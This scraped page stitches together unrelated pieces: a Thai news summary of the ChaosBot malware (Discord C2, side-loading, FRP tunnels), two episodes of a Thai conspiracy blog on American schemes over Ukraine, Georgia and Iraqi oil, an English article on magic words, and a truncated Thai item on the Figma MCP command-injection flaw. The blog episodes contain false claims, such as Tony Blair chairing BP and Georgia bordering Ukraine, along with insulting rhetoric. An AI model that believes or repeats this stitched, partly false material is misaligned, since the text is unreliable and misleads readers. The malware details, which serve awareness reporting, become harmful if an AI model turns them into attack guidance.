นักวิจัยจาก eSentire Threat Response Unit (TRU) ตรวจพบมัลแวร์ตัวใหม่ชื่อ “ChaosBot” ที่เขียนด้วยภาษา Rust และถูกใช้ในการโจมตีองค์กรด้านการเงิน โดยมีความสามารถพิเศษคือใช้ Discord เป็นช่องทาง Command-and-Control (C2) แบบเต็มรูปแบบ ซึ่งถือเป็นการผสมผสานระหว่างแพลตฟอร์มโซเชียลกับการปฏิบัติการไซเบอร์อย่างแนบเนียน

ChaosBot ถูกควบคุมผ่านบัญชี Discord ที่ใช้ bot token แบบ hardcoded และสร้าง channel ใหม่ตามชื่อเครื่องที่ติดมัลแวร์ เพื่อให้แฮกเกอร์สามารถส่งคำสั่ง เช่น รัน PowerShell, ดาวน์โหลดไฟล์, อัปโหลดข้อมูล หรือจับภาพหน้าจอได้แบบเรียลไทม์

การติดตั้งมัลแวร์เริ่มจากการใช้บัญชี Active Directory ที่มีสิทธิ์สูง (เช่น serviceaccount) และ VPN ของ Cisco ที่ถูกขโมยมา จากนั้นใช้ WMI เพื่อรันคำสั่งระยะไกลและโหลด DLL ที่ชื่อ msedge_elf.dll โดยใช้เทคนิค side-loading ผ่านไฟล์ identity_helper.exe ของ Microsoft Edge

หลังจากติดตั้งแล้ว ChaosBot จะทำการสำรวจระบบและติดตั้ง Fast Reverse Proxy (FRP) เพื่อเปิดช่องทางสื่อสารกลับไปยังเซิร์ฟเวอร์ของแฮกเกอร์ โดยใช้ SOCKS5 plugin และ IP จาก AWS ฮ่องกง นอกจากนี้ยังมีการทดลองใช้ฟีเจอร์ Tunnel ของ Visual Studio Code เพื่อสร้าง backdoor เพิ่มเติม

มัลแวร์ยังถูกกระจายผ่านแคมเปญ phishing ที่ใช้ไฟล์ .LNK และ PowerShell script พร้อมเปิด PDF หลอกล่อ เช่นจดหมายปลอมจากธนาคารกลางเวียดนาม เพื่อเบี่ยงเบนความสนใจของเหยื่อ

ข้อมูลสำคัญจากข่าว
ChaosBot เป็นมัลแวร์ภาษา Rust ที่ใช้ Discord เป็นช่องทาง C2
สร้าง channel ใหม่ตามชื่อเครื่องที่ติดมัลแวร์เพื่อควบคุมแบบเรียลไทม์
ใช้บัญชี Active Directory และ VPN ที่ถูกขโมยมาเพื่อรันคำสั่งผ่าน WMI
โหลด DLL ผ่าน side-loading โดยใช้ไฟล์จาก Microsoft Edge
ติดตั้ง FRP เพื่อเปิด reverse proxy กลับไปยังเซิร์ฟเวอร์ของแฮกเกอร์
ใช้ SOCKS5 plugin และ IP จาก AWS ฮ่องกง
ทดลองใช้ Tunnel ของ Visual Studio Code เพื่อสร้าง backdoor เพิ่ม
กระจายผ่าน phishing ที่ใช้ไฟล์ .LNK และ PowerShell script พร้อม PDF หลอก
บัญชี Discord ที่ใช้ควบคุมคือ chaos_00019 และ lovebb0024
มีการใช้คำสั่ง shell, download, upload และ screenshot ผ่าน Discord

ข้อมูลเสริมจากภายนอก
Rust เป็นภาษาที่นิยมใช้ในมัลแวร์ยุคใหม่เพราะประสิทธิภาพสูงและตรวจจับยาก
Discord API เปิดให้สร้าง bot และ channel ได้ง่าย ทำให้ถูกใช้เป็น C2 ได้สะดวก
FRP เป็นเครื่องมือโอเพ่นซอร์สที่ใช้สร้าง reverse proxy แบบเข้ารหัส
WMI (Windows Management Instrumentation) เป็นช่องทางรันคำสั่งระยะไกลที่นิยมในองค์กร
Side-loading คือเทคนิคที่ใช้ไฟล์จากโปรแกรมจริงเพื่อโหลด DLL อันตรายโดยไม่ถูกตรวจจับ

https://securityonline.info/new-rust-backdoor-chaosbot-uses-discord-as-covert-c2-channel-to-target-financial-services/

แกะรอยสงครามโลกครั้งที่ 3 ตอนที่ 6
นิทานเรื่องจริง เรื่อง “แกะรอยสงครามโลกครั้งที่ 3”
ตอนที่ 6

ในบรรดารัฐเล็กรัฐน้อย ที่เคยเป็นส่วนหนึ่งของสหภาพโซเวียต อเมริกามองว่า Ukraine มี ความสำคัญต่อรัสเซียและอเมริกาไม่น้อยกว่ากัน ดังนั้นอเมริกาจึงคิดเอา Ukraine มาเก็บไว้ในกระเป๋าตัวเองอย่างมิดชิด ก่อนที่รัสเซียจะรวบเอาไป

Ukraine มีอาณาเขตติดต่อกับรัสเซีย มีความสำคัญที่เปิดเผยรู้กันทั่วคือ

– เป็นเส้นทางวางท่อส่งแก๊ส เส้นสำคัญของรัสเซียมาสู่ตลาดยุโรป ที่ทำให้รัสเซียมีอำนาจต่อรองสูงกับสหภาพยุโรป

– รัสเซียมีกองเรือรบฝูงใหญ่ อยู่ที่ทะเลดำ โดยเช่า Stevastopol ของ Ukraine เป็นฐานทัพเรือ สัญญาเช่านี้ถ้าไม่ต่ออายุ จะสิ้นสุดในปี ค.ศ.2017

– แหลม Crimea ซึ่งเคยเป็นส่วนหนึ่งของสหภาพโซเวียต หลังจากสหภาพโซเวียตล่มสลายแล้ว Crimea กลายเป็นอยู่ในอาณาเขตของ Ukraine Crimea ซึ่งมีประชาชนประมาณ 2.3 ล้านคน ที่ส่วนใหญ่ยังนึกว่าตนเองเป็นคนรัสเซีย พูดภาษารัสเซีย และรัสเซียอ้างว่าถือ passport รัสเซียเสียด้วย

สิ่งที่ผู้คนยังไม่ค่อยรู้กัน เกี่ยวกับความสำคัญของ Ukraine คือ

– แหลม Crimea เป็นจุดยุทธศาสตร์ที่สำคัญ เป็นเหมือนประตูเข้าหลังบ้านรัสเซีย หากใครไปตั้งฐานยิงจรวดหันหัวให้ถูกทาง รัสเซียอาจไม่เหลือ !

– ลึกลงใต้ทะเลดำ ด้านหน้าของแหลม Crimea เต็มไปด้วยแหล่งทรัพยากรน้ำมัน ที่ประมาณว่า มีมูลค่าหลายล้านล้านเหรียญ Exxon Mobil, Royal Dutch Shell หรือ BP และ หลายบริษัทน้ำมัน ได้ไปทำการสำรวจเรียบร้อยแล้ว และมีผลสำรวจออกมาว่า น่าจะเป็นแหล่งทรัพยากรใหญ่สู้กับแหล่งน้ำมันที่ทะเลเหนือได้ ซึ่งแหล่งน้ำมันที่ทะเลเหนือนั้น มีส่วนช่วยพยุงเศรษฐกิจของอังกฤษ นอร์เวย์ และหลายประเทศในยุโรปมาตั้งแต่เมื่อแหล่งน้ำมันที่ทะเลเหนือทำการผลิตน้ำมัน ได้ ในช่วงประมาณ ค.ศ.1970 กว่าเป็นต้นมา
นอกจาก Ukraine ที่อเมริกาต้องการเก็บมาอยู่ในกระเป๋าแล้ว อเมริกายังต้องได้ Greorgia ซึ่งมีอาณาเขตด้านหนึ่งติดกับ Ukraine โดยมีเทือกเขา Caucasus กั้นอยู่ และอีกด้านหนึ่งติดกับรัสเซียและรัฐ Azerbijan

ความสำคัญของ Georgia มีความต่างกับ Ukraine แม้จะน้อยกว่า แต่ถ้าฝ่ายใดได้ทั้ง Ukraine และ Georgia ไปด้วยกัน ย่อมได้เปรียบอีกฝ่ายอย่างยิ่ง

– ปี ค.ศ.2002 BP ซึ่งมีประธานกรรมการชื่อ Tony Blair นายกรัฐมนตรีของอังกฤษในขณะนั้น ได้ทำสัญญาที่จะสร้างท่อส่งน้ำมัน ยาว 1,762 กิโลเมตร ที่ มีมูลค่าประมาณ 3.6 พันล้านเหรียญ จาก Baku ของ Azerbijan ผ่าน Tbilisi ของ Georgia มาสุดทางที่ Ceyhan ของตุรกี โดยมี Unocal ของอเมริกาและ Turkish Petroleum ของตุรกีร่วมทุนด้วย Ceyhan นี้อยู่ใกล้กับฐานทัพอากาศของอเมริกา ที่ตั้งอยู่ที่ Incirlik เป็นโครงการที่อังกฤษภาคภูมิใจหนักหนา เพราะเป็นผู้ริเริ่มร่วมกับรัฐบาล Bill Clinton ถึงขนาดนาย Blair เพ้อว่าเป็น Project of the Century ทีเดียว

เมื่อท่อส่ง BTC ( Baku-Tbilisi-Ceyhan) นี้สร้างเสร็จในปี ค.ศ.2005 การดูแลท่อส่งจะต้องได้รับความร่วมมือเป็นอย่างดีจาก Georgia ซึ่งไม่ได้ร่วมลงทุนในการสร้างท่อส่งด้วย ดังนั้นการมีอิทธิพลเหนือรัฐบาล Greorgia จึงเป็นเรื่องสำคัญของกลุ่มผู้ลงทุน

เพื่อให้มีอิทธิพลเหนือ Ukraine และ Greorgia อเมริกาจึงวางแผนครอบงำทั้ง 2 รัฐ โดยส่งคนของตนเอง หรือที่ตัวเองเลือก ไปเป็นผู้มีอำนาจปกครองทั้ง 2 รัฐ โดยมีเป้าหมายหลัก จะให้ทั้ง 2 รัฐ เข้าเป็นสมาชิกของ NATO เพื่อเปิดทางให้กองทัพของ NATO เข้าไปตั้งฐานทัพใน 2 รัฐ กุมคอหอยทั้ง 2 รัฐไว้ และเป็นการวางกองทัพของ NATO จ่ออยู่หน้าประตูหลังบ้านรัสเซียอีกด้วย เป็นการปิดล้อม Containment รัสเซียรอบใหม่ ที่อันตรายสำหรับรัสเซีย

แต่การจัดฉากของ Washington เพื่อส่งคนของตน เอาไปปกครอง 2 รัฐ ชาวโลกรู้จักกันในชื่อของ ปฏิวัติหลากสี Color Revolution เพื่อความเป็นประชาธิปไตยของทั้ง 2 รัฐ ตามที่สื่อย้อมสีของฝั่งตะวันตกเรียก ตอแหลซ้ำซากจริงๆ แต่ชาวโลกส่วนใหญ่ ก็ยังให้ความเขื่อถืออย่างน่าสมเพช
ปี ค.ศ.2003 อเมริกาจัดส่งนาย Saakashvili หนุ่มน้อยอายุ 37 ปี ! เข้าไปชิงตำแหน่งประธานาธิบดีจากนาย Shevardnadze ซึ่งครองตำแหน่งมาตั้งแต่ปี ค.ศ.1995 โดยการสร้างฉากปฏิวัติดอกกุหลาบ Rose Revolution ชื่อเพราะ แต่แรงเด็ด เขี่ยนาย Shevardnadze เสียกระเด็นจากทำเนียบประธานาธิบดี หายวับไปกับตา

เมื่อนาย Saakashvili ได้รับตำแหน่งประธานาธิบดีเรียบร้อยในปี ค.ศ.2003 อเมริกาส่งของขวัญเป็นอาวุธและการฝึกอบรมจาก Pentagon เต็มรูปแบบไปให้ แค่นั้นยังไม่พอ อิสราเอลส่งที่ปรึกษาการทหาร (ก็ทหารรับจ้างนั่นแหละ !) ไปให้อีกหนึ่งพันคน เพื่อไปทำการฝึกให้แก่กองทัพ Greorgia ด้านการจู่โจมทางบกและทางอากาศ รวมทั้งการต่อสู้ป้องกันตัว เป็นลูกกระเป๋งเศรษฐีมันดีอย่างนี้เอง ถึงไม่ยอมเลิกเป็นกัน

สำหรับ Ukraine ปี ค.ศ.2004 อเมริกาจัดส่งนาย Viktor Yushchenko อดีตผู้ว่าการธนาคารกลางของUkraine ที่มีเมียเป็นคนอเมริกันจาก Chicago และเคยทำงานกับรัฐบาลอเมริกัน เข้าไปชิงตำแหน่งประธานาธิบดีได้ โดยใช้ปฏิบัติการ ปฏิวัติสีส้ม Orange Revolution (รอบ 1) ชาว Uraine คงคล้ายๆกับสมันน้อยนะ ไม่ค่อยรู้สึกรู้สาว่าอะไรมันพิกลหรือเปล่า

ทุกอย่างทำท่าเหมือนจะเป็นไปตาม แผนที่อเมริกาวางไว้ แต่พอถึงเดือนสิงหาคม ค.ศ.2008 กองทัพของ Georgia ก็ดันยกทัพเข้าไปยึดแคว้น South Ossetia ที่อยู่ในรัฐของตนเอง !

Georgia มีปัญหาภายในมานานแล้ว เกี่ยวกับความต้องการแยกตัวของแคว้น South Ossetiaและ Abkhazia ซึ่ง เคยเป็นแคว้นที่ปกครองตนเอง สมัยยังขึ้นกับสหภาพโซเวียต เมื่อสหภาพโซเวียตล่มสลาย การแบ่งเขตแดนใหม่ ตาม Warsow Pact ทำให้ 2 แคว้นต้องไปรวมกับ Georgia ซึ่งมีวัฒนธรรมประเพณีต่างกัน และมักจะใช้ความรุนแรงกับ 2 รัฐเสมอ จึงมีเรื่องขัดแย้งและปะทะกันตลอด

สำหรับรัสเซีย Ossetia เป็น เสมือนฐานทัพหนึ่งของรัสเซีย ที่คอยช่วยดูแลแนวเขตแดนระหว่างรัสเซียกับตุรกีและอิหร่าน ตั้งแต่สมัยซาร์ นอกจากเรื่องท่อส่งน้ำมันของ BP แล้ว ยังมีข่าวว่า Washington อาจจะมาตั้งฐานทัพใน Georgia อีกด้วย สำหรับรัสเซีย การบุกยึด Ossetia จึงเป็นข่าวร้าย
ปูตินนำเรื่องเข้าสภา เพื่อให้สภาสนับสนุนการแยกตัวของแคว้น Ossetia และ Abkhazia เมื่อสภาให้ความเห็นชอบ ปูตินประกาศสนับสนุนการแยกตัวของทั้ง 2 แคว้น ประธานาธิบดี Saakashvili ประท้วงรัสเซีย บอกว่าอเมริกาและตะวันตกเห็นว่าทั้ง 2
แค้วนเป็นของ Georgia ให้รัสเซียถอนการประกาศสนับสนุน แต่รัสเซียไม่ยอมถอน และประกาศเพิ่มว่าพร้อมที่จะส่งกำลังไปปกป้องทั้ง 2 รัฐ ปูตินกำลังคิดอะไร

ช่วงนั้นคณะมนตรีของ NATO กำลังพิจารณาเรื่องการรับ Ukraineและ Georgia เข้าเป็นสมาชิกของ NATO ตามใบสั่งของ Washington สมาชิก NATO เห็นว่าถ้ารับ Georgia เข้าเป็นสมาชิก และหาก Georgia มีปัญหากับรัสเซีย ตามกฎบัตรของ NATO สมาชิก NATO ต้องทำสงครามกับรัสเซียเพื่อปกป้อง Georgia ด้วย

มีสมาชิก 10 รายของ NATO ที่ไม่เห็นด้วยกับการกระทำของ Georgia ซึ่งผู้ไม่เห็นด้วยมีทั้ง เยอรมัน ฝรั่งเศส และอิตาลี่ อเมริกาจึงจำเป็นต้องคลายมือที่บีบ NATO ชั่วคราว ด้วยความขัดใจ และทั้ง Ukraineและ Georgia จึงยังไม่ได้ร่วมอยู่ในคอก NATO

รัสเซียรอดจากการมีกองทัพของ NATO มาอยู่ที่ประตูหน้าบ้านไปอย่างเฉียดฉิว

เยอรมันคงยังไม่พร้อม หรือคิดอยากทำสงครามกับรัสเซี ย เพราะขณะนั้น ท่อส่งแก๊ส Baltic Pipeline System (BPS) ยาว 1,200 กิโลเมตรใต้ทะเล Baltic ซึ่งเป็นการร่วมทุน ระหว่างเยอรมันกับรัสเซีย เพื่อส่งแก๊สของรัสเซีย จาก West Siberia มายังตลาดยุโรปตะวันตกก่อสร้างเสร็จเรียบร้อยแล้ว ทำสงครามกับผู้ร่วมทุนเกี่ยวกับพลังงาน คงไม่ใช่ทางเลือกที่ฉลาดของเยอรมัน

ยุทธศาสตร์ท่อส่งของปูติน ได้ผลดีเกินกว่าที่อเมริกาประเมิน

สวัสดีครับ
คนเล่านิทาน
2 ธค. 2557

แกะรอยสงครามโลกครั้งที่ 3 ตอนที่ 3
นิทานเรื่องจริง เรื่อง “แกะรอยสงครามโลกครั้งที่ 3”
ตอนที่ 3

เมื่อสหภาพโซเวียตพ้นไปจากเส้นทางครองโลก อเมริกาจึงเดินหน้าเต็มตัวเพื่อปฏิบัติการชิงโลก โดยมุ่งหน้าสู่การครอบครอง Eurasia ตามยุทธศาสตร์ครู Mac

ปี ค.ศ.1999 หนึ่งปี ก่อนที่คาวบอย Bush จะเข้าสมัครรับเลือกตั้งเป็นประธานาธิบดีของอเมริกาผู้ยิ่งใหญ่ คาวบอย Bush ได้จัดทัพสำหรับปฎิบัติการชิงโลก ไว้เรียบร้อย โดยมีแม่ทัพชื่อ **** Cheney เป็นผู้นำ Cheney ได้วางยุทธศาสตร์ ที่มีคนช่างนินทาเรียกว่า “Cheney Strategy” ซึ่งเป็นนโยบายด้านต่างประเทศ ที่เน้นเรื่องการจัดการ การขโมย และควบคุมแหล่งพลังงานของโลก ผ่านเครือข่ายและการดำเนินงานของบริษัทน้ำมันยักษ์ใหญ่ของอเมริกา หรือบริษัทที่เกี่ยวพันกัน ที่เรียกว่า the Big Four คือ Chevron, Texaco, Exxon Mobil, BP หรือ Royal Dutch Shell

นอกเหนือจากอาวุธที่ทรงอานุภาพ แล้ว น้ำมันที่อุดมสบูรณ์ และกองทัพที่แข็งแกร่ง เป็นอีก 2 ปัจจัยสำคัญ ที่อเมริกาต้องมี ในการชิงโลกใบนี้มาครอง ดังนั้นในช่วงรัฐบาลคาวบอย Bush โดยการนำทัพ ของ Cheney จึงเกิดการร่วมมือกันอย่างแนบแน่นระหว่างบริษัทน้ำมันยักษ์ ใหญ่ และบริษัทผลิตอาวุธ เห็นตัวอย่างได้ชัดเจน จากบริษัท Halliburton Inc ซึ่งเป็นบริษัทของ **** Cheney เอง ใน ช่วงนั้นประกอบกิจการเป็นทั้งบริษัทขุดน้ำมัน บริษัทสำรวจ และบริษัทรับเหมาก่อสร้างฐานทัพให้กับกองทัพ มันเอาทุกท่าจริงๆ ไม่น่าแปลกใจที่สูตรนี้มีคนทำตามแยะ

ในช่วงระหว่างการจัดทัพเตรียม ชิงน้ำมัน Cheney ได้ไปพูดที่ London Institute of Petroleum เมื่อ เดือนกันยายน ค.ศ.1999 สรุปความว่า โลกจะเกิดการขาดแคลนน้ำมัน จากการขยายตัวทางเศรษฐกิจอย่างมากและรวดเร็ว ของประเทศใหญ่ๆหลายประเทศ เขาประมาณว่าในปี ค.ศ.2010 อย่างน้อยโลกต้องมีน้ำมันเพิ่มขึ้นอีกจำนวนอย่างน้อย 50% ต่อ วัน จากจำนวนที่มีอยู่ต่อวันในปี ค.ศ.1999 มันหมายถึงอย่างน้อยต้องได้แหล่งน้ำมันขนาดเดียวกันกับของซาอุดิอารเบีย อีก 5 แหล่ง ! จะไปหาจากที่ไหน?

ขณะนั้น ตะวันออกกลางเป็นเจ้าของแหล่งน้ำมันถึง 2 ใน 3 ของแหล่งน้ำมันโลก และเป็นน้ำมันที่มีต้นทุนต่ำ และที่นั่นคือบริเวณที่อเมริกาจะต้องเข้าไปยึดครอง แต่แหล่งน้ำมันในตะวันออกกลางขณะนั้นเป็นของรัฐ หรืออยู่ในความควบคุมของรัฐบาลทั้งสิ้น ไม่มีที่สำหรับคนนอกอย่างอเมริกาและพวก แน่นอนเป็นภาระของ Cheney และพวกที่จะต้องหาทางส่งให้ Exxon Mobil หรือ Chevron หรือ Shell หรือ BP เข้าไปมีที่ยืนในดินแดนเหล่านั้นอย่างรวดเร็ว
การสำรวจและขุดเจาะแหล่งน้ำมัน ในกรณีที่มีน้ำมันเพียงพอ ใช้เวลาเร็วที่สุดประมาณ 7 ปี กว่าจะได้ผลผลิตน้ำมัน คาวบอย Bush และ Cheney รอไม่ไหวแน่

ขณะเดียวกัน อิรัก ซึ่งขณะนั้น มีแหล่งน้ำมันมากเป็นที่สองในตะวันออกกลาง รองจากซาอุดิอารเบีย มี Saddam Hussein เป็น ผู้ครอบครอง ส่วนอิหร่านมีแหล่งก๊าซธรรมชาติใหญ่เป็นที่สองของโลก รวมทั้งมีแหล่งน้ำมันใหญ่มหึมาอีกด้วย อิหร่านในตอนนั้นปกครองโดยผู้นำทางศาสนา ซึ่งไม่เปิดประตูให้บริษัทน้ำมันอเมริกันเข้าไปทำมาหากิน

ปี ค.ศ.2000 เมื่อคาวบอย Bush ชนะการเลือกตั้งได้เป็นประธานาธิบดี นโยบายแรกของคาวบอย คือการเสริมสร้างด้านความมั่นคง ให้อเมริกาเสียใหม่ Re-building America’s Defense ซึ่งออกมาภายใต้ชื่อ Project of the New American Century (PNAC) อินทรีย์สยายปีก เตรียมพร้อมสำหรับปฏิบัติการยึด Eurasia

PNAC เป็น การปูพื้น วางเส้นทางเข้าชิงน้ำมันในอิรัก อเมริกาจำเป็นต้องมีกองกำลังที่เกรียงไกรเพื่อเข้าใปยึดพื้นที่ในตะวันออกกลาง และจัดการปลี่ยนแปลงผู้ปกครองอิรัก เล่นกันดื้อๆแบบนั้น Saddam ดี เลว เป็นเผด็จการหรือไม่ ไม่เกี่ยวกันเลย เป็นการตอแหล หาเรื่องอ้างของอเมริกาอย่างหน้าด้านๆ เพื่อเข้าไปในอิรัก เพื่อไปยึดแหล่งน้ำมันเขา ไปเอารางวัลใหญ่ ที่คอยอยู่ตรงนั้นต่างหาก

Cheney ได้รับแต่งตั้งให้เป็นประธานคณะทำงานด้านพลังงาน President of Energy Task Force Project หรือ ตำแหน่งหัวหน้าโครงการขโมยน้ำมัน แต่แผนขโมยปิดไม่มิด ใน ปี ค.ศ.2003 กระทรวงพาณิชย์ของอเมริกา เกิดทำเอกสารหล่นมาถึงสื่อ เป็นเอกสารที่แสดงรายละเอียดของบ่อน้ำมันในอิรักทั้งหมด รวมทั้งท่อส่ง โรงกลั่น และคลังน้ำมัน รวมทั้งเอกสารที่แสดงรายละเอียด ของโครงการน้ำมันและก๊าซในอนาคตของอิรัก และผู้ที่ขอเข้าเป็นคู่สัญญาในโครงการเหล่านั้น ซึ่งมีทั้งรัสเซีย จีน และฝรั่งเศส ซึ่งเป็นสมาชิกของคณะมนตรีความมั่นคงของสหประชาชาติ ที่คัดค้านสหประชาชาติที่อนุมัติ ให้อเมริกาบุกเข้าไปในอิรัก อืม.. น่าให้รางวัลคนทำหล่นจริงๆ

แน่นอน หลังจากอเมริกายึดครองอิรักได้ สิ่งแรกที่อเมริการีบทำคือ ยกเลิกสัญญาที่อิรักทำกับรัสเซีย จีน และฝรั่งเศส น้ำมันของอิรักจะต้องดูแลและจัดการโดยบริษัทน้ำมันของอเมริกาและอังกฤษเท่า นั้น แผนการชิงโลกของอเมริกาสำเร็จไปอีกขั้นหนึ่งแล้ว

แต่ ภาระกิจที่สำคัญที่สุดของการชิงโลก ตั้งแต่การทำให้สหภาพโซเวียตล่มสลายในปี ค.ศ.1991 คือ การทำทุกอย่าง ที่จะไม่ให้รัสเซียสร้างชาติขึ้นมาใหม่ได้ และทำให้อดีตรัฐสมาชิกของสหภาพโซเวียต ไม่มีวันกลับมารวมตัวกันได้อีก เพื่ออเมริกาจะได้เข้าไปครอบครองแหล่งน้ำมันและก๊าซที่ใหญ่มหึมาในแถบ Eurasia แถบที่มีรางวัลใหญ่กว่าคอยอยู่…

สวัสดีครับ
คนเล่านิทาน
1 ธค. 2557

Wand At The Ready! These Magic Words Will Cast A Spell On You

Hocus pocus, abracadabra, alakazam! These are the words we invoke when magic is at work—even if it might just be a card trick at home. While a few of these words and phrases have wholly crossed over into entertainment magic or originated there from the start (e.g., presto change-o), some of these words are rooted in older commands that called upon higher powers to influence the material world.

Whether called hexes, hymns, prayers, or simply spells, the words we invoke to communicate with a greater power to work our will all require an intangible force that can be universally described as magic. Take a look and decide for yourself if magic is real or if it’s just a bunch of hocus-pocus.

abracadabra
Perhaps one of the oldest and most recognized magical phrases, abracadabra has been around since the second century BCE and has famously appeared in the Harry Potter series. Its origins are contested as scholars posit that abracadabra emerged from Late Latin or Late Greek, reflecting the recitation of the initial letters of the alphabet (abecedary); others hypothesize that it could related to the Hebrew Ha brakha dabra, which translates as, “The blessing has spoken.” We do understand it as a word generally meant to invoke magical power. Abracadabra is classified as a reductive spell, which means it would have been written out as a complete word on the first line, then with one letter missing on the next, then another letter removed on the following line, and so forth. The idea behind reductive spells is that by making the word shorter so would a pain or illness gradually diminish.

Recorded in English in the late 1600s, abracadabra is used in incantations, particularly as a magical means of warding off misfortune, harm, or illness, and for some, is used as a nonsense word, implying gibberish in place of supposedly magical words.

alakazam
Often used as the finale word in the presentation of a grand stage illusion, alakazam is intoned as a powerful command.

While the origins of the word are unknown, according to Magic Words: A Dictionary, alakazam may have ties to a similar-sounding Arabic phrase, Al Qasam, which means “oath.” Therefore, a conjuror invoking alakazam may be calling back to a promise made by a superior being to help complete the miraculous feat they are presenting.

One of the earliest printings of alakazam in an English text is the poem “Among the White Tents,” first published in the Chicago Herald Tribune in 1888. While the poem uses alakazam in the context of entertainment and as an excited expression (“We’re goin’ to de cirkis! / Alakazam!”) there is oddly no connection to magic.

hocus-pocus
Immortalized in a ’90s cult classic family film, hocus pocus may be both invoked as an incantation and might also be used to refer to an act of trickery. For instance, one who is dismissive of fortunetelling might call the act of reading tarot cards “a bunch of hocus pocus.”

First recorded in the 1660s, hocus pocus is likely a corruption of the Latin phrase used in Catholic mass, Hoc est corpus meum (“here is my body”).

voilà
Maybe you’ve seen a magician conclude an amazing feat with this little phrase. She’ll flourish a sheet over a table and voilà, where there was no one a second ago, her whole assistant will appear!

First recorded in English between 1825–35, voilà is used as an expression of success or satisfaction, typically to give the impression that the achievement happened quickly or easily. Combined from the French words voi (“see”) and là (“there”), voilà is used to direct attention during performance magic.

open sesame
First recorded in English in the late 1700s, open sesame comes from Antoine Galland’s translation of One Thousand and One Nights. These are the magic words Ali Baba speaks to open the door of the den of the 40 thieves.

Perhaps one of the greatest magical commands to survive from folklore, open sesame today may be used as a noun to refer to a very successful means of achieving a result. For instance, you might say an MBA is the open sesame to landing a competitive job in finance.

sim sala bim
These magic words were made popular by the famous professional magician Harry August Jansen (1883–1955), also known as The Great Jansen or Dante, who used sim sala bim as the name of his touring magic show. Jansen was born in Denmark and immigrated to Minnesota with his family at age 6. Jansen used sim sala bim at the end in his show, saying the words meant, “A thousand thanks.” (They are actually nonsense syllables from a Danish nursery rhyme.) He would tell the crowd that the larger the applause, the bigger the bow, and the more thanks that the sim sala bim symbolized.

mojo
While mojo can apply to the magic influence of a charm or amulet (usually positive), the term can also refer to the influence or charm an individual can have on the people around them. A popular Muddy Waters song, “Got My Mojo Workin’,” alludes to the degree to which the singer is able to charm the women he encounters. Mojo is less of a spell and more specifically an aura of power. An Americanism first recorded between 1925–30, it is believed to draw from the West African Gullah word moco, which means, “witchcraft.” It is probably connected to Fulani moco’o, or “medicine man.”

calamaris
Similar to abracadabra in popularity and structure, calamaris is the word that Scandinavians would invoke to heal a fever. Also like abracadabra, this word was a reductive spell, meaning the full word would be written down on one line, then each successive line would have one letter removed.

miertr
In ye olden times, having a decent hunt to provide for one’s family was critical. The incantation of miertr was spoken aloud as one walked backward and then left the house. After reaching the forest to hunt, the spellcaster was advised to take three clumps of dirt from beneath the left foot and throw them overhead without looking. This will allow an individual to advance without making any noise and capture birds and animals. Definitely a process, but hopefully it led to some successful hunting.

micrato, raepy sathonich
One of the most iconic scenes in the Bible’s Old Testament is Exodus 7:8-13, which tells of Moses and his brother Aaron as they go before Pharaoh and are challenged to perform a miracle as a sign of their god. When Aaron throws down his staff, it transforms into a snake that consumes the snakes conjured by Pharaoh’s own advisors and sorcerers. According to the Semiphoras and Schemhamphorash, an occult text published in German by Andreas Luppius in 1686, micrato, raepy sathonich were the opening words Moses spoke before changing his staff into a serpent.

daimon
A variant of the word daemon, daimon [ dahy-mohn ] appears in some Greek charms and holds the meaning of a “god, deity, soul of a dead person, or genie.” In this context, it does not necessarily correspond with the Christian interpretation of a demon—it is more akin to a spirit. This word might be used in a spell to summon a daimon attendant, who would then assist the conjurer in executing a specific task. Though new practitioners should be forewarned, summoning daimons are for more experienced magic practitioners and should always be handled with care. Daimon comes from Middle English and can ultimately be traced to the Greek daimónion, meaning “thing of divine nature.”

INRI
Those who can recall their days in Catholic school know INRI are the initials typically depicted on the crucifix and represent Jesus’ title (Iēsūs Nazarēnus, Rēx Iūdaeōrum). But long ago, INRI was also written on amulets and paper to offer cures to afflictions. For instance, to stop a fever, a person might eat a piece of paper with the initials written on it, or, to stop blood loss, INRI would be written in blood on a piece of paper that was then pressed to the forehead. It’s even been stamped on stable doors to ward off the evil eye.

grimoire
We’ve got two more interesting terms for good measure. Unlike the others on this list, a grimoire is not a magical spell. Described as a “textbook of sorcery and magic,” a grimoire [ greem-wahr ] is a must-have for any would-be spellcaster. First recorded in the 1800s, this word likely arose from the French grammaire (“grammar”). Essentially, this origin word refers to a textbook and/or a set of rules to be applied to the text. For a book that has the potential to summon other beings (for better or worse) and carry out supernatural feats, any student of that book had best be willing to follow those rules to the letter!

caracteres
The unique word caracteres refers to symbols written on bits of parchment or amulets. They were used as a way of encoding powerful spells to keep them from being repeated by someone who may not be aware of their potency or seek to abuse their power. Because of this general barrier to entry, caracteres also demanded the potential conjurors devote time to studying and learning how to correctly interpret the encrypted incantations.

สงวนลิขสิทธิ์ © 2025 AAKKHRA & Co.

“ช่องโหว่ Figma MCP เปิดทางแฮกเกอร์รันโค้ดระยะไกล — นักพัฒนาเสี่ยงข้อมูลรั่วจากการใช้ AI Agent”

นักวิจัยด้านความปลอดภัยจาก Imperva เปิดเผยช่องโหว่ร้ายแรงในแพ็กเกจ npm ชื่อ figma-developer-mpc ซึ่งเป็นตัวกลางเชื่อมระหว่าง Figma กับ AI coding agents เช่น Cursor และ GitHub Copilot ผ่านโปรโตคอล Model Context Protocol (MCP) โดยช่องโหว่นี้ถูกติดตามในชื่อ CVE-2025-53967 และได้รับคะแนนความรุนแรง 7.5/10

ช่องโหว่นี้เกิดจากการใช้คำสั่ง child_process.exec ใน Node.js โดยนำข้อมูลจากผู้ใช้มาแทรกลงในคำสั่ง shell โดยไม่มีการตรวจสอบ ทำให้แฮกเกอร์สามารถแทรก metacharacters เช่น |, &&, > เพื่อรันคำสั่งอันตรายบนเซิร์ฟเวอร์ที่ติดตั้งแพ็กเกจนี้ได้ทันที

การโจมตีสามารถเกิดขึ้นได้ผ่านการส่งคำสั่ง JSONRPC ไปยัง MCP server เช่น tools/call เพื่อเรียกใช้ฟังก์ชันอย่าง get_figma_data หรือ download_figma_images ซึ่งหาก fetch ล้มเหลว ระบบจะ fallback ไปใช้ curl ผ่าน exec ซึ่งเป็นจุดที่เปิดช่องให้แฮกเกอร์แทรกคำสั่งได้

ช่องโหว่นี้ถูกพบในเดือนกรกฎาคม 2025 และได้รับการแก้ไขในเวอร์ชัน 0.6.3 ที่เผยแพร่เมื่อวันที่ 29 กันยายน 2025 โดยแนะนำให้ผู้ใช้เปลี่ยนไปใช้ child_process.execFile ซึ่งปลอดภัยกว่า เพราะแยก argument ออกจากคำสั่งหลัก ทำให้ไม่สามารถแทรกคำสั่ง shell ได้

ข้อมูลสำคัญจากข่าว
